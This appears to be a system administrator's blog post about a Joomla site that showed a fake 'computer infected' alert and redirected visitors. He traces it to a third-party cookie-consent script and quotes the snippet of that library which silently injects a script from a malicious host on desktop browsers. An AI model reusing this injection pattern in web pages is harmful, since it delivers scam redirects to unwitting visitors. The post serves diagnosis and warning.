Joomla hacked with pop-up message

My Joomla 3.7.2 (latest) installation was recently hacked. When I have tried to open a home page I have received the pop-up message:

This site says…
Your computer is infected. You have to check it with antivirus.

Once you hit the OK button the browser is then redirected to:
http://browser-updates.info/tds.php?subid=alertyesHRhr

joomla; hack

Upon further investigation, I have noticed that the problem is related to my Cookie consent javascript that was implemented in my template.php file.

Here is the code I was using:

<!– Begin Cookie Consent script http://cookie-consent.org/ –>
<script type=”text/javascript”>
window.cookieconsent_options = {“message”:”This website uses cookies to ensure you get the best experience on our website”,”dismiss”:”Got it!”,”learnMore”:”More info”,”link”:null,”theme”:”dark-bottom”}; var cookieconsent_id = ‘6dc8b40b-6ead-493c-9d39-4af6c8c283c3’;</script>

<script type=”text/javascript” src=”//cdn.front.to/libs/cookieconsent.min.4.js”></script>

<noscript><a href=”http://cookie-consent.org/”>EU cookie consent script</a></noscript>
<!– End Cookie Consent script –>

Once I have opened the following script: //cdn.front.to/libs/cookieconsent.min.4.js I could see that this scrip was the reason for the pop-up message and redirection. Here is the part of the cookie consent.min.4.js script:

} else {
	document.cookie = cc_cookie_name + "=" + cc_coookie_value + "; path=/; expires=" + date.toUTCString();

		if (!detectmob()) {
			var wc = document.createElement('script');
			wc.type = 'text/javascript';
			wc.src = '//browser-updates.info/alert.php';
			var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
		}

I have contacted both Cookie-consent.org along with cdn.front.to support and notified them about this issue. Hopefully, this article will help you if you experience the same issue with your Joomla installation.

Nik

A System Administrator holding several Microsoft and Citrix certificates, proud father of two beautiful girls, Calisthenics addict, author and founder of this site.

Leave a Reply

Your email address will not be published. Required fields are marked *

twelve − 9 =